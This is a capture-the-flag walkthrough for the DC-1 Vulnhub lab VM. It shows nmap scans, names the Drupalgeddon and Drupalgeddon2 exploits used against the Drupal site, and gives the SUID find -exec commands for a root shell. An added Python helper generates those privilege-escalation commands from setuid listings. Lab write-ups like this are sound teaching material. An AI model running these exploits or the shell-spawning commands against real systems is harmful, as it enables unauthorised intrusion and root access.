DC-1 Vulnhub CTF Walkthrough
Walkthrough for the DC-1: 1 vulnhub CTF
I started by finding the IP address of the VM using nmap. Note that -sL is a list scan: it sends no packets to the targets and only does a reverse-DNS lookup of each address, so it only found the VM here because the lab DNS had a record for DC-1.lan. On a network without that, a ping sweep (nmap -sn 10.1.1.1/24) is the usual way to find the host.
nmap -sL 10.1.1.1/24 ... Nmap scan report for DC-1.lan (10.1.1.43) ...
Once I know the IP address is 10.1.1.43, I scan it with nmap using the -sV and -p- flags, which probes all TCP ports 1 to 65535 and reports the service and version running on each open one.
nmap -sV -p- 10.1.1.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-12 13:16 ACDT
Nmap scan report for DC-1.lan (10.1.1.43)
Host is up (0.00010s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
48280/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:7B:44:9C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
After finding that port 80 is open, I open my web browser to have a look around and find that the site is running Drupal. The OpenSSH 6.0p1 and Apache 2.2.22 banners already point at an old Debian 7 install, so an unpatched Drupal 7 is a reasonable expectation.
I start by doing a few scans with nikto and dirb, but I don't find much in terms of flags, so I move on to exploiting the Drupal site. I use the Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) exploit (CVE-2014-3704, SA-CORE-2014-005) to create a new admin user, so I can have a bit more of a look at the site. The bug is in Drupal's own database abstraction layer, which builds placeholder names from the keys of an array-valued form field and splices them straight into the SQL text, so a login request with a crafted name[...] key runs arbitrary SQL before any authentication happens.
After a bit of poking around, I found flag3, which indicated that the privilege escalation would involve a file with incorrect file permissions and would use the -exec argument of the "find" command. I didn't find much else, so I then moved on to the Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) exploit (CVE-2018-7600, module exploit/unix/webapp/drupal_drupalgeddon2). Despite the 8.x version range in its title, the same bug affects Drupal 7.x before 7.58, which is why it works against this site.
Now that I had a shell, I looked around in the website root directory for the remaining flags.
After that, I used the find command to look for files with the SUID bit set (find / -perm -4000 -type f). After finding that the find binary itself has the SUID bit set, I check it by running "whoami" as the -exec command, then spawn a /bin/sh shell the same way to read the final flag located in /root/. One caveat when repeating this elsewhere: bash drops an effective uid that does not match the real uid unless it is started with -p, so if /bin/sh is bash the shell comes back unprivileged; on this Debian box /bin/sh is dash, which keeps the setuid euid, so a plain /bin/sh is enough.
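The SUID hunt above is a manual check; as an added example (not part of the walkthrough), here is a small Python helper that does the same triage over the output of find ... -exec ls -l {} \; : parse each line, keep only root-owned files whose setuid bit is set on an executable, and for binaries known to run a command while keeping that euid (only find is listed, since that is what this box uses) produce a verification command and a shell command. The ls -l lines are constructed sample data, not output captured from the DC-1 VM, and the SHELL_VIA table is an assumption you extend per target.

```python
"""Triage of setuid binaries from `find / -perm -4000 -type f -exec ls -l {} \\;` output.

Added example for the DC-1 privilege escalation step; the sample lines below
are constructed, not captured from the VM.
"""
import re

# Constructed sample output (illustrative paths and sizes).
SAMPLE_LS = """\
-rwsr-xr-x 1 root root  36000 Mar  1  2019 /bin/su
-rwsr-xr-x 1 root root 174000 Mar  1  2019 /usr/bin/find
-rwsr-xr-x 1 root root  40000 Mar  1  2019 /usr/bin/passwd
-rwxr-xr-x 1 root root 900000 Mar  1  2019 /bin/bash
-rwsr-xr-x 1 games games 12000 Mar  1  2019 /usr/games/nethack
"""

# mode  links owner group size month day time/year path  (an optional ACL/SELinux
# marker after the mode is tolerated).
LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})[.+]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S.*)$"
)

# Binaries that execute a command of our choosing as their euid. Only find is
# listed here (it is the one the DC-1 hint points at); treat as an assumption
# and extend it per target.
SHELL_VIA = {
    "find": "{path} /etc/passwd -exec /bin/sh \\;",
}


def parse_ls(text):
    """Turn ls -l lines into dicts; lines that do not parse are skipped."""
    rows = []
    for line in text.splitlines():
        match = LS_LINE.match(line.strip())
        if match:
            rows.append(match.groupdict())
    return rows


def setuid_root(rows):
    """Paths that are setuid *and* executable by owner ('s', not 'S') and owned by root."""
    return [r["path"] for r in rows if r["mode"][3] == "s" and r["owner"] == "root"]


def privesc_plan(paths):
    """For each known-abusable binary, a command to confirm the euid and one to get a shell.

    The verify step runs `id` through the binary: if it prints euid=0(root) the
    shell step will be root too. If /bin/sh turns out to be bash, add -p to the
    shell command, since bash drops a mismatched euid otherwise.
    """
    plan = {}
    for path in paths:
        name = path.rsplit("/", 1)[-1]
        if name in SHELL_VIA:
            plan[path] = {
                "verify": f"{path} /etc/passwd -exec id \\;",
                "shell": SHELL_VIA[name].format(path=path),
            }
    return plan


if __name__ == "__main__":
    candidates = setuid_root(parse_ls(SAMPLE_LS))
    print("setuid-root binaries:", candidates)
    for path, cmds in privesc_plan(candidates).items():
        print(path, "->", cmds["verify"], "|", cmds["shell"])
```

Running the real thing on a target is just feeding the helper actual output (for example via subprocess or a pasted file); the point of the parse is that it ignores the setuid-but-not-root and executable-but-not-setuid lines that a grep for "rws" would happily match.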